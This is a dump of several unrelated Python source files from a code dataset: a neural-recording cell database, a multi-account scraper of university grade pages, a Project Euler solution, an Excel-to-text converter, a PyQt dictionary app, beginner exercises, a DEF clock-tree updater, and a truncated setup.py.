behavior file.\n Attributes:\n subject(str): Name of the subject\n date (str): The date the experiment was 
conducted\n depth (int): The depth in microns at which the sessions were recorded\n timestamp (str): The timestamp used by openEphys GUI to name the session\n behavsuffix (str): The suffix of the behavior file\n sessiontype (str): A string describing what kind of session this is.\n paradigm (str): The name of the paradigm used to collect the session\n comments (list): list of strings, comments about the session\n '''\n def __init__(self, subject, date, brainarea, info, depth, tetrodes, timestamp, behavsuffix, sessiontype, paradigm, comments=[]):\n self.subject = subject\n self.date = date\n self.depth = depth\n self.tetrodes = tetrodes\n self.timestamp = timestamp\n self.behavsuffix = behavsuffix\n self.sessiontype = sessiontype\n self.paradigm = paradigm\n self.comments = comments\n def ephys_dir(self):\n '''\n Join the date and the session timestamp to generate the actual directory used store the ephys data\n Returns:\n path (str): The full folder name used by OpenEphys to save the ephys data\n DEPRECATED (2017-10-30): We are going to return just the timestamp, not with the date attached\n '''\n path = os.path.join('{}_{}'.format(self.date, self.timestamp))\n return path\n # def behav_filename(self):\n # '''\n # Generate the behavior filename from session attributes and the beahvior suffix.\n # Returns:\n # fn (str): The full behavior filename\n # DEPRECATED (2017-10-30) We are going to return the suffix and paradigm, not the full path for each session\n # '''\n # fn=None\n # if self.behavsuffix:\n # bdate = ''.join(self.date.split('-'))\n # fn = '{}_{}_{}{}.h5'.format(self.subject,\n # self.paradigm,\n # bdate,\n # self.behavsuffix)\n # return fn\n def pretty_print(self):\n '''\n Print a string containing the timestamp and sessiontype string\n '''\n return \"{}: {}\".format(self.timestamp, self.sessiontype)\n def __str__(self):\n '''\n Use self.pretty_print() if someone tries to print a session\n '''\n return self.pretty_print()\n def comment(self, message):\n '''\n Add a message to the list of comments\n Args:\n message (str): The message string to append\n '''\n self.comments.append(message)\n\n#Use the pandas dataframe functions directly\n# def save_dataframe_as_HDF5(path, dataframe):\n# '''\n# Saves a dataframe to HDF5 format.\n\n# Args:\n# path (str): /path/to/file.h5\n# dataframe (pandas.DataFrame): dataframe object\n# '''\n# dataframe.to_hdf(path, 'dataframe')\n\n# def load_dataframe_from_HDF5(path, **kwargs):\n# '''\n# See pandas.read_hdf docs for useful kwargs (loading only certain rows, cols, etc)\n# Args:\n# path (str): /path/to/file.h5\n# '''\n# dataframe = pd.read_hdf(path, key='dataframe', **kwargs)\n# return dataframe\n\ndef generate_cell_database(inforecPath):\n '''\n Iterates over all sites in an inforec and builds a cell database. 
This function requires that the data is already clustered.\n Args:\n inforecPath (str): absolute path to the inforec file\n Returns:\n db (pandas.DataFrame): the cell database\n '''\n\n #clusterDirFormat = 'multisession_exp{}site{}'\n tetrodeStatsFormat = 'Tetrode{}_stats.npz'\n #inforec = imp.load_source('module.name', inforecPath) # 'module.name' was meant to be an actual name\n inforec = imp.load_source('inforec_module', inforecPath)\n print('\\n# -- Generating database for new inforec file -- #\\n')\n db = pd.DataFrame(dtype=object)\n for indExperiment, experiment in enumerate(inforec.experiments):\n #Complain if the maxDepth attr is not set for this experiment\n if experiment.maxDepth is None:\n print(\"Attribute maxDepth not set for experiment with subject {} on {}\".format(experiment.subject, experiment.date))\n # maxDepthThisExp = None\n raise AttributeError('You must set maxDepth for each experiment.')\n else:\n maxDepthThisExp = experiment.maxDepth\n print('Adding experiment from {} on {}'.format(experiment.subject, experiment.date))\n for indSite, site in enumerate(experiment.sites):\n #clusterDir = clusterDirFormat.format(indExperiment, indSite)\n clusterFolder = site.clusterFolder\n for tetrode in site.tetrodes:\n clusterStatsFn = tetrodeStatsFormat.format(tetrode)\n clusterStatsFullPath = os.path.join(settings.EPHYS_PATH,\n inforec.subject,\n clusterFolder,\n clusterStatsFn)\n if not os.path.isfile(clusterStatsFullPath):\n raise NotClusteredYetError(\"Experiment {} Site {} Tetrode {} is not clustered.\\nNo file {}\".format(indExperiment, indSite, tetrode,clusterStatsFullPath))\n clusterStats = np.load(clusterStatsFullPath)\n\n for indc, cluster in enumerate(clusterStats['clusters']):\n #Calculate cluster shape quality\n clusterPeakAmps = clusterStats['clusterPeakAmplitudes'][indc]\n clusterSpikeSD = clusterStats['clusterSpikeSD'][indc]\n clusterShapeQuality = abs(clusterPeakAmps[1]/clusterSpikeSD.mean())\n clusterDict = {'maxDepth':maxDepthThisExp,\n 'tetrode':tetrode,\n 'cluster':cluster,\n 'nSpikes':clusterStats['nSpikes'][indc],\n 'isiViolations':clusterStats['isiViolations'][indc],\n 'spikeShape':clusterStats['clusterSpikeShape'][indc],\n 'spikeShapeSD':clusterSpikeSD,\n 'spikePeakAmplitudes':clusterPeakAmps,\n 'spikePeakTimes':clusterStats['clusterPeakTimes'][indc],\n 'spikeShapeQuality':clusterShapeQuality}\n clusterDict.update(site.cluster_info())\n db = db.append(clusterDict, ignore_index=True)\n #NOTE: This is an ugly way to force these columns to be int. Will fix in future if possible\n db['tetrode'] = db['tetrode'].astype(int)\n db['cluster'] = db['cluster'].astype(int)\n db['nSpikes'] = db['nSpikes'].astype(int)\n return db\n\ndef find_cell(database, subject, date, depth, tetrode, cluster):\n cell = database.query('subject==@subject and date==@date and depth==@depth and tetrode==@tetrode and cluster==@cluster')\n if len(cell)>1:\n raise AssertionError('This information somehow defines more than 1 cell in the database.')\n elif len(cell)==0:\n raise AssertionError('No cells fit this search criteria.')\n elif len(cell)==1:\n return cell.index[0], cell.iloc[0] #Return the index and the series: once you convert to series the index is lost\n\ndef get_cell_info(database, index):\n '''\n The index is THE index from the original pandas dataframe. 
It is not the positional index.\n '''\n cell = database.loc[index]\n cellDict = {'subject':cell['subject'],\n 'date':cell['date'],\n 'depth':cell['depth'],\n 'tetrode':cell['tetrode'],\n 'cluster':cell['cluster']}\n return cellDict\n\ndef save_hdf(dframe, filename):\n '''\n Save database as HDF5, in a cleaner format than pandas.DataFrame.to_hdf()\n Use celldatabase.load_hdf() to load these files.\n\n Args:\n dframe: pandas dataframe containing database.\n filename: full path to output file.\n\n TODO: save index\n '''\n h5file = h5py.File(filename,'w')\n string_dt = h5py.special_dtype(vlen=str)\n # try:\n if 1:\n dbGroup = h5file.require_group('/') # database\n for onecol in dframe.columns:\n onevalue = dframe.iloc[0][onecol]\n if isinstance(onevalue, np.ndarray):\n arraydata = np.vstack(dframe[onecol].values)\n dset = dbGroup.create_dataset(onecol, data=arraydata)\n elif isinstance(onevalue, int) or \\\n isinstance(onevalue, float) or \\\n isinstance(onevalue, bool) or \\\n isinstance(onevalue, np.bool_):\n arraydata=dframe[onecol].values\n dset = dbGroup.create_dataset(onecol, data=arraydata)\n elif isinstance(onevalue, str):\n arraydata = dframe[onecol].values.astype(str)\n dset = dbGroup.create_dataset(onecol, data=arraydata)\n elif isinstance(onevalue, list):\n # For columns like: behavSuffix, ephysTime, paradigm, sessionType\n arraydata = dframe[onecol].values\n dset = dbGroup.create_dataset(onecol, data=arraydata, dtype=string_dt)\n else:\n raise ValueError('Trying to save items of invalid type')\n #dset.attrs['Description'] = onecol\n h5file.close()\n # except:\n # h5file.close()\n # # TODO: We may want to rename the incomplete h5 file\n # raise\n\ndef load_hdf(filename, root='/'):\n '''\n Load database into a pandas dataframe from an HDF5 file\n saved by celldatabase.save_hdf()\n\n Args:\n filename: full path to HDF5 file.\n root: the HDF5 group containing the database.\n '''\n dbDict = {}\n try:\n h5file = h5py.File(filename,'r')\n except IOError:\n print('{0} does not exist or cannot be opened.'.format(filename))\n raise\n for varname,varvalue in list(h5file[root].items()):\n if varvalue.dtype==np.int or varvalue.dtype==np.float:\n if len(varvalue.shape)==1:\n dbDict[varname] = varvalue[...]\n else:\n dbDict[varname] = list(varvalue[...]) # If it is an array\n if varvalue.dtype.kind=='S':\n dbDict[varname] = varvalue[...]\n if varvalue.dtype==np.object:\n dataAsList = [ast.literal_eval(v) for v in varvalue]\n dbDict[varname] = dataAsList\n h5file.close()\n return pd.DataFrame(dbDict)\n\n\n\nclass NotClusteredYetError(Exception):\n pass\n\n# def find_cell(db, subject, date, depth, tetrode, cluster):\n# cell = db.query('subject==@subject and date==@date and depth==@depth\\\n# and tetrode==@tetrode and cluster==@cluster')\n# if len(result)!=1:\n# #Does not exist or not unique\n# raise\n# return cell[0]\n\n'''\nimport h5py\nh5file = h5py.File('/tmp/test.h5','w')\ndbGroup = h5file.require_group('/')\n\ndset = dbGroup.create_dataset('mykey', data=x)\nh5file.close()\n'''\n","sub_path":"celldatabase.py","file_name":"celldatabase.py","file_ext":"py","file_size_in_byte":33141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"118415452","text":"from multiprocessing.dummy import Pool\nfrom urllib.parse import parse_qs, urlparse\n\nfrom scraper.webvpn_browser import WebvpnBrowser\nfrom scraper.group_page import SubjectsList\nfrom scraper.group_disciplines import DisciplineTutor\nfrom scraper.progress import ProgressList\nfrom 
scraper.students_list import StudentsList\nfrom scraper.save_in_json import JsonSave\n\n\ndef save_progress_pages(arg):\n    vpn, urls = arg\n    global COUNT\n    for url in urls:\n        COUNT += 1\n        \n        print(str(COUNT) + ', Errors: ' + str(len(errors)) + '\\n', end='')\n        data = parse_progress_page(vpn, url)\n        if data:\n            if data['progress']:\n                progress_j.push(data['progress'])\n            if data['disciplines']:\n                disciplines_j.push(data['disciplines'])\n            if data['students']:\n                students_j.push(data['students'])\n\n\ndef parse_progress_page(vpn, url):\n    try:\n        group_id = parse_qs(urlparse(url).query)['gid'][0]\n        page = vpn.get_marks_page(url)\n        sbjlist = SubjectsList(page)\n        group = sbjlist.group\n        print(group['name'])\n        links = sbjlist.get_links_list()\n        del sbjlist\n\n        students_list = StudentsList(page, group_id)\n        students_data = students_list.get_students()\n        \n        progress_data = {'group':group, 'disciplines':[]}\n        disciplines = {}\n        students = []\n        for link in links:\n            discipline_page = vpn.get_discipline_progress(link['url'])\n            disc_id = parse_qs(urlparse(link['url']).query)['dis'][0]\n            tutor = DisciplineTutor(discipline_page)\n            if link['name'] in disciplines:\n                disciplines[link['name']]['types'].append({'type': link['type'], 'tutors': tutor.get_tutors()})\n            else:\n                disciplines[link['name']] = {'name':link['name'], 'department': link['department'], 'id': disc_id,\n                                             'types':[{'type': link['type'], 'tutors': tutor.get_tutors()}]}\n\n            progress = ProgressList(discipline_page, link['name'], link['type'])\n            if not students:\n                students = progress.parse_names()\n            progress.names = students\n            progress_data['disciplines'].append(progress.parse())\n\n        disciplines_data = {'name': group['name'], 'id': group_id, 'disciplines': [i for i in disciplines.values()]}\n        \n        return {'progress': progress_data, 'disciplines': disciplines_data, 'students': students_data}\n    except Exception as e:\n        errors.append([url, e])\n        f = open(disciplines_j.errors_dir + '/group_disciplines_first_{}_errors.txt'.format(len(errors)), 'w')\n        f.write('\\n'.join([str(i[1]) + ' ' + i[0] for i in errors]))\n        f.close()\n\n\nauths_num = WebvpnBrowser.auths()\n\n\n\nCOUNT = 0\ndisciplines_j = JsonSave('disciplines', 'groups')\nprogress_j = JsonSave('progress', 'groups')\nstudents_j = JsonSave('students', 'groups')\n\nerrors = []\n\nurls = WebvpnBrowser(1).get_marks_pages_list()\n\npages_num = len(urls)\npages_per_worker = pages_num // auths_num\nprint('Total accounts in use:', auths_num)\nprint('Groups per account (approximate):', pages_per_worker)\npool = Pool(auths_num)\nworkers = []\nworker_pages_range = [0, pages_per_worker]\nfor i in range(1, auths_num+1):\n    workers.append((WebvpnBrowser(i), urls[worker_pages_range[0]:worker_pages_range[1]]))\n    worker_pages_range = [worker_pages_range[1], worker_pages_range[1]*2]\n\nresults = pool.map(save_progress_pages, workers)\npool.close()\npool.join()\n\n\nif len(errors):\n    print('Errors occurred on', len(errors), 'pages')\n    f = open(disciplines_j.errors_dir + '/groups_discipline_errors.txt', 'w')\n    f.write('\\n'.join([str(i[1]) + ' ' + i[0] for i in errors]))\n    f.close()\n\n    error_urls = [i[0] for i in errors]\n    print('Trying to parse the failed pages again')\n    errors = []\n    save_progress_pages([WebvpnBrowser(1), error_urls])\n    print('Result: {} errors'.format(len(errors)))\n\n\ndisciplines_j.commit()\nprogress_j.commit()\nstudents_j.commit()\n","sub_path":"run_group_disciplines.py","file_name":"run_group_disciplines.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"318836248","text":"#!/usr/bin/python\n# Filename: pr52.py\n\"\"\"It can be seen that the number, 125874, and its double, 251748, contain exactly the same digits, but in a different order.\n\nFind the smallest positive integer, x, such that 2x, 3x, 4x, 5x, and 6x, contain the same digits.\"\"\"\n\nPERM_COUNT = 6\ndef is_perm(_val0):\n    \"\"\"returns TRUE if multiples of _val0, up to PERM_COUNT, are permutations of _val0, FALSE otherwise\"\"\"\n    sortedval0 = sorted(str(_val0))\n    for i in range(2, PERM_COUNT+1):\n        if sortedval0!=sorted(str(_val0*i)):\n            return False\n    return True\n\nif __name__==\"__main__\":\n    # setup\n    digit_count = 1\n    while True:\n        for i in range(10**(digit_count-1), 10**digit_count//PERM_COUNT):\n            if(is_perm(i)):\n                print(i)\n                quit()\n\n        digit_count+=1\n","sub_path":"pr52.py","file_name":"pr52.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"258233652","text":"# coding='gbk'\n'''\nfunction: convert an Excel file to text\nauthor:Nstock\ndate:2018/3/1\n'''\nimport pandas as pd\nimport re\nimport codecs\n\n\n# Convert the Excel file to a txt file\ndef exceltotxt(excel_dir, txt_dir):\n    with codecs.open(txt_dir, 'w', 'utf-8') as f:\n        neg = pd.read_excel(excel_dir, header=None, index=None)\n        f.write(neg.to_string())\n\n\n# Strip the leading numbers and spaces from each record line\ndef del_linehead_number_speace(orig_txt_dir, saveas_txt_dir):\n    with open(orig_txt_dir, 'r+',encoding='UTF-8') as f, open(saveas_txt_dir, 'r+',encoding='UTF-8') as fw:\n        lines = f.readlines()\n        print(len(lines))  # number of lines\n        texts = [re.sub(r'(\\d)+(\\s)+', '', lines[num]) for num in range(len(lines))]\n\n        texts = list(set(texts))  # deduplicate; comment this line out to keep duplicate records\n\n        line_num = len(texts)\n        # for num in range(line_num):  # inspect the converted text\n        #     print(texts[num])\n        fw.writelines(texts)\n\n\nexceltotxt('./123.xlsx', './neg_temp.txt')\ndel_linehead_number_speace('./neg_temp.txt', './neg.txt')","sub_path":"python/third_library/excel2txt/excel2txt.py","file_name":"excel2txt.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"197938133","text":"#!/usr/bin/env python\n#coding:utf-8\n\"\"\"\n    Author: G.K.\n    Purpose: \n    Created: 2016/3/3\n\"\"\"\n\nimport sys\nfrom PyQt4 import QtGui\nfrom PyQt4 import QtCore\nfrom dictionary import translate\nimport urllib2\nimport ctypes\n# compiler\nimport FixTk\n\nicon = \"dict.ico\"\ndef center(w):\n    qr = w.frameGeometry()\n    cp = QtGui.QDesktopWidget().availableGeometry().center()\n    qr.moveCenter(cp)\n    w.move(qr.topLeft())\n    \ndef main():\n    app = QtGui.QApplication(sys.argv)\n    \n    w = QtGui.QWidget()\n    w.resize(500, 309) # 0.618\n    #w.move(300, 300)\n    center(w)\n    w.setWindowTitle('Clean Dictionary')\n    \n    textbox = QtGui.QLineEdit(w)\n    btn = QtGui.QPushButton(\"Query\")\n    \n    hbox = QtGui.QHBoxLayout()\n    hbox.addWidget(textbox)\n    hbox.addWidget(btn)\n    \n    logOutput = QtGui.QTextEdit(w)\n    logOutput.setReadOnly(True)\n    logOutput.setLineWrapMode(QtGui.QTextEdit.NoWrap)\n    \n    font = logOutput.font()\n    font.setFamily(\"Consolas\") # Courier Consolas\n    font.setPointSize(12)    \n    \n    logOutput.setCurrentFont(font)    \n    textbox.setFont(font)\n    p = logOutput.palette()\n    
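# give the read-only output pane an explicit white background via its palette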
\n    p.setColor(QtGui.QPalette.Base, QtGui.QColor(255,255,255))\n    logOutput.setPalette(p)\n    \n\n    vbox = QtGui.QVBoxLayout()\n    vbox.addLayout(hbox)\n    vbox.addWidget(logOutput)\n    \n    w.setLayout(vbox)\n    \n    def on_clicked():\n        query = textbox.text()\n        if query.isEmpty():\n            return\n        query = unicode(query).encode('utf8')\n        out = translate(query)\n        logOutput.setPlainText(out)\n    \n    btn.clicked.connect(on_clicked)\n    textbox.returnPressed.connect(on_clicked)\n    w.show()\n    try:\n        app.setWindowIcon(QtGui.QIcon(icon))\n        w.setWindowIcon(QtGui.QIcon(icon))\n    except:\n        pass\n    sys.exit(app.exec_())\n    \nif __name__ == '__main__':\n    myappid = u'mycompany.myproduct.subproduct.version' # arbitrary string\n    ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)    \n    main()\n","sub_path":"ui.pyw","file_name":"ui.pyw","file_ext":"pyw","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"525694449","text":"#Name: Shany Perez\n#Email: shany.perez67@myhunter.cuny.edu\n#Date: Aug 27, 2019\n#This program will encrypt the input message by shifting the ASCII value of each character down by 13\n\nuserInput = input()\t#input() lets the user enter data from the console\nencripted = \"\"\n\nfor i in userInput:\t\t#Runs for each character in the userInput variable\n\tcode = ord(i) - 13\t#Shift the Unicode value of the character down by 13\n\tif code < ord('a'):\t#Check if the shifted value of the character is lower than the Unicode value of the character 'a'\n\t\td = (ord('a') - 1) - (code)\t\t#Subtract the value of the shifted character from the value of the character before 'a'\n\t\tn = ord('z') - d\t\t\t\t#Subtract the difference from the value of 'z'\n\t\tencripted += chr(n)\t\t\t\t#Add the new character to the string 'encripted'\n\telse :\n\t\tencripted += chr(code)\t\t\t#Add the new character to the string\nprint(encripted)","sub_path":"9.EncriptedMessage/EncriptedMessage.py","file_name":"EncriptedMessage.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"549193095","text":"lista = [50,50,30,5,1]\n#print(lista)\n\nlista[1] = 52\nmaximo = max(lista)\nminimo = min(lista)\nsumalista = sum(lista)\n\n#print (lista)\n#print(maximo, \" \", minimo,\" \",sumalista)\n\nmatriz = [[0,0,0],[0,0,0],[0,0,0]]\nfor i in matriz:\n    print(i)\n\nlisma = [0,0,0]\nmatriz2 = [lista]*3\nprint(matriz2)\nprint()\n\ntamañoMatriz = len(matriz2)\n#print(tamañoMatriz)\n\n##########################################\n\nnumero_filas = 2\nnumero_columnas = 3\n\nmatrix = []\nfor i in range(numero_filas):\n    matrix.append([])\n    for j in range(numero_columnas):\n        matrix[i].append(None)\nprint(\"Method 1\")\nprint(matrix)\nprint()\nprint(\"Method 2\")\nmatrix10 = [0]*numero_filas\nfor i in range(numero_filas):\n    matrix10[i] = [0]*numero_columnas\n\nfor m in matrix10:\n    print(m)","sub_path":"Buscaminas.py","file_name":"Buscaminas.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"488857678","text":"#////////////////////////////////////////////////////////////////////////////////////\n#// Authors: Kwangsoo Han and Jiajia Li\n#// (Ph.D. advisor: Andrew B. Kahng),\n#// Many subsequent changes for open-sourcing were made by Mateus Fogaça\n#// (Ph.D. 
advisor: Ricardo Reis)\n#//\n#// BSD 3-Clause License\n#//\n#// Copyright (c) 2018, The Regents of the University of California\n#// All rights reserved.\n#//\n#// Redistribution and use in source and binary forms, with or without\n#// modification, are permitted provided that the following conditions are met:\n#//\n#// * Redistributions of source code must retain the above copyright notice, this\n#// list of conditions and the following disclaimer.\n#//\n#// * Redistributions in binary form must reproduce the above copyright notice,\n#// this list of conditions and the following disclaimer in the documentation\n#// and/or other materials provided with the distribution.\n#//\n#// * Neither the name of the copyright holder nor the names of its\n#// contributors may be used to endorse or promote products derived from\n#// this software without specific prior written permission.\n#//\n#// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n#// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n#// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n#// DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n#// FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n#// DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n#// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n#// CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n#// OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n#// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#////////////////////////////////////////////////////////////////////////////////////\nfrom collections import defaultdict\nfrom statistics import median\nfrom math import floor, ceil\n\nnetlistFilePath\t\t\t\t= 'netlist.txt' \nplacementFilePath \t\t\t= 'locations.txt' \noriginalPlacementFilePath \t= 'cell_locs.txt' \ndefFile \t\t\t\t\t= 'place.def'\n\nmapping \t= defaultdict(list)\nnets \t\t= defaultdict(list)\nplacement \t= defaultdict(list)\n\n#------------------------------------------------------------------------------\n# Read netlist from\ndef readNetlistFile():\n\twith open(netlistFilePath) as fp:\n\t\tfor line in fp:\n\t\t\tterms = line.rstrip(\"\\n\").split(' ')\n\t\t\tif terms[0] is \"B\":\n\t\t\t\tfor i in range(2, len(terms)):\n\t\t\t\t\tnets[terms[1]].append([terms[i].rstrip(\"/_CK_PIN_\"), \"_CK_PIN_\"])\n\t\t\telse:\n\t\t\t\tnode \t= \"ck_\" + terms[0]\n\t\t\t\tlibCell\t= terms[1]\n\t\t\t\tinNet \t= terms[2]\n\t\t\t\toutNet\t= terms[3]\n\t\t\t\tnets[inNet].append([node, \"A\"])\n\t\t\t\tnets[outNet].append([node, \"_BUFF_OUT_PIN_\"])\n\t\t\t\tmapping[node] = libCell\n\t\tnets[\"_CK_PORT_\"].append([\"PIN\", \"_CK_PORT_\"])\t\t\n\n#------------------------------------------------------------------------------\n# Read placement from locations file (CT file)\ndef readPlacementFile():\n\twith open(placementFilePath) as fp:\n\t\tfor line in fp:\n\t\t\tterms = line.rstrip(\"\\n\").split(' ')\n\t\t\tplacement[\"ck_\" + terms[0]].append(terms[1])\n\t\t\tplacement[\"ck_\" + terms[0]].append(terms[2])\n\n#------------------------------------------------------------------------------\n\n# Read placement from locations file (Original placement)\ndef readOriginalPlacementFile():\n\twith open(originalPlacementFilePath) as fp:\n\t\tfor line in fp:\n\t\t\tterms = line.rstrip(\"\\n\").split(' 
')\n\t\t\tplacement[terms[0]].append(terms[1])\n\t\t\tplacement[terms[0]].append(terms[2])\n\n#------------------------------------------------------------------------------\n# Append clock components \ndef writeComponents():\n\tfor node, libCell in mapping.items():\n\t\tx = int(float(placement[node][0]) * 1000)\n\t\ty = int(float(placement[node][1]) * 1000)\n\t\tprint(\" - \" + node + \" \" + libCell + \" + PLACED ( \" + str(x) + \" \" + str(y) + \" ) N\\n;\")\n\n#------------------------------------------------------------------------------\ndef writeNets():\n\tfor net, components in nets.items():\n\t\tprint(\"- \" + net)\t\n\t\tfor node, pin in components:\n\t\t\tprint(\"( \" + node + \" \" + pin + \" )\")\n\t\tprint(\";\")\n\t\n#------------------------------------------------------------------------------\n\ndef writeGuides():\n\tf = open(\"g.guides\", \"w\")\n\n\tgcellw = 5*1360\n\tgcellh = 5*1000\n\ttolx = 1500\n\ttoly = 1200\n\tfor net, components in nets.items():\n\t\txlocs = []\n\t\tylocs = []\n\t\tfor node, pin in components:\n\t\t\txlocs.append(float(placement[node][0])*1000)\t\n\t\t\tylocs.append(float(placement[node][1])*1000)\n\t\txmax = max(xlocs)\n\t\txmin = min(xlocs)\n\t\tymax = max(ylocs)\n\t\tymin = min(ylocs)\n\t\t\t\n\t\tf.write(net + \"\\n\")\n\t\tf.write(\"(\\n\")\n\n\t\tguidesm1 = \"\"\n\t\tguidesm2 = \"\"\n\t\tguidesm3 = \"\"\n\t\tguidesm4 = \"\"\n\t\tif xmax-xmin > ymax-ymin: #trunk horizontal\n\t\t\tycoord = median(ylocs)\n\t\t\t\n\t\t\t# build trunk...\n\t\t\tygrid \t\t= floor(ycoord/gcellh)\n\t\t\txgridmin\t= floor(xmin/gcellw)\t\n\t\t\txgridmax\t= floor(xmax/gcellw)\n\t\t\t\n\t\t\tguide = str((xgridmin-1)*gcellw) + \" \" + str((ygrid-1)*gcellh) + \" \" + str((xgridmax+2)*gcellw) + \" \" + str((ygrid+2)*gcellh)\n\t\t\tguidesm1 = guidesm1 + guide + \" M1\\n\"\n\t\t\tguidesm2 = guidesm2 + guide + \" M2\\n\"\n\t\t\tguidesm3 = guidesm3 + guide + \" M3\\n\"\n\t\t\tguidesm4 = guidesm4 + guide + \" M4\\n\"\n\n\t\t\t# build stems...\n\t\t\tfor i in range(0, len(xlocs)):\n\t\t\t\txgrid = floor(xlocs[i]/gcellw)\n\t\t\t\tygridmin = min(ygrid, floor(ylocs[i]/gcellh))\n\t\t\t\tygridmax = max(ygrid, floor(ylocs[i]/gcellh))\t\n\t\t\t\t\n\t\t\t\tguide = str((xgrid-1)*gcellw) + \" \" + str((ygridmin-1)*gcellh) + \" \" + str((xgrid+2)*gcellw) + \" \" + str((ygridmax+2)*gcellh)\n\t\t\t\tguidesm1 = guidesm1 + guide + \" M1\\n\"\n\t\t\t\tguidesm2 = guidesm2 + guide + \" M2\\n\"\n\t\t\t\tguidesm3 = guidesm3 + guide + \" M3\\n\"\n\t\t\t\tguidesm4 = guidesm4 + guide + \" M4\\n\"\n\t\telse: # trunk vertical\n\t\t\txcoord = median(xlocs)\n\t\t\t\n\t\t\t# build trunk...\n\t\t\txgrid \t\t= floor(xcoord/gcellw)\n\t\t\tygridmin\t= floor(ymin/gcellh)\t\n\t\t\tygridmax\t= floor(ymax/gcellh)\n\t\t\t\n\t\t\tguide = str((xgrid-1)*gcellw) + \" \" + str((ygridmin-1)*gcellh) + \" \" + str((xgrid+2)*gcellw) + \" \" + str((ygridmax+2)*gcellh);\n\t\t\tguidesm1 = guidesm1 + guide + \" M1\\n\"\n\t\t\tguidesm2 = guidesm2 + guide + \" M2\\n\"\n\t\t\tguidesm3 = guidesm3 + guide + \" M3\\n\"\n\t\t\tguidesm4 = guidesm4 + guide + \" M4\\n\"\n\n\t\t\t# build stems...\n\t\t\tfor i in range(0, len(xlocs)):\n\t\t\t\tygrid = floor(ylocs[i]/gcellh)\n\t\t\t\txgridmin = min(xgrid, floor(xlocs[i]/gcellw))\n\t\t\t\txgridmax = max(xgrid, floor(xlocs[i]/gcellw))\t\n\t\t\t\tguide = str((xgridmin-1)*gcellw) + \" \" + str((ygrid-1)*gcellh - toly) + \" \" + str((xgridmax+2)*gcellw + tolx) + \" \" + str((ygrid+2)*gcellh)\n\t\t\t\tguidesm1 = guidesm1 + guide + \" M1\\n\"\n\t\t\t\tguidesm2 = guidesm2 + guide + \" 
M2\\n\"\n\t\t\t\tguidesm3 = guidesm3 + guide + \" M3\\n\"\n\t\t\t\tguidesm4 = guidesm4 + guide + \" M4\\n\"\n\n\t\tf.write(guidesm1);\n\t\tf.write(guidesm2);\n\t\tf.write(guidesm3);\n\t\tf.write(guidesm4);\n\t\tf.write(\")\\n\")\n\tf.close()\n#------------------------------------------------------------------------------\n\n### main\nreadNetlistFile()\nreadPlacementFile()\n\nwith open(defFile) as fp:\n\t\tfor line in fp:\n\t\t\tline = line.rstrip(\"\\n\")\n\t\t\tterms = line.split(\" \")\n\t\t\tif \"COMPONENTS\" in line and \"END\" not in line:\n\t\t\t\tterms = line.split(\" \")\n\t\t\t\tnumComponents = int(terms[1]) + len(mapping)\n\t\t\t\tprint(\"COMPONENTS \" + str(numComponents) + \" ;\")\n\t\t\t\twriteComponents()\n\t\t\telif \"NETS\" in line and \"END\" not in line and \"SPECIAL\" not in line: \n\t\t\t\tterms = line.split(\" \")\n\t\t\t\tnumNets = int(terms[1]) + len(nets) - 1\n\t\t\t\tprint(\"NETS \" + str(numNets) + \" ;\")\n\t\t\t\twriteNets()\n\t\t\telif \"- _CK_PORT_\" in line and not \"NET\" in line: # Skip the original clock net\n\t\t\t\twhile \";\" not in line:\n\t\t\t\t\tline = fp.readline()\n\t\t\telse: \n\t\t\t\tprint(line)\n\n#readOriginalPlacementFile()\n#writeGuides()\n","sub_path":"src/scripts/update_def.py","file_name":"update_def.py","file_ext":"py","file_size_in_byte":7773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"521228321","text":"import os\nimport sys\nimport subprocess\nfrom setuptools import setup, find_packages\n\nhere = os.path.abspath(os.path.dirname(__file__))\nREADME = open(os.path.join(here, 'README.txt')).read()\nCHANGES = open(os.path.join(here, 'CHANGES.txt')).read()\n\nrequires=['pyramid>=1.5a2',\n          'SQLAlchemy',\n          'transaction',\n          'pyramid_tm',\n          'pyramid_debugtoolbar',\n          'zope.sqlalchemy', \n          'waitress',\n          'ziggurat-foundations',\n          'colander',\n          'deform>=2.0a2',\n          'pyramid_chameleon',\n          'psycopg2',\n          'alembic>=0.3.4',\n          'pyramid_beaker',\n          'pytz',\n          'xlrd',\n          'sqlalchemy-datatables',\n          'pyjasper',\n          'requests',\n          'pyramid_rpc',\n          'paste',\n          'pyramid_translogger',\n          ]\n\nif sys.argv[1:] and sys.argv[1] == 'develop-use-pip':\n    bin_ = 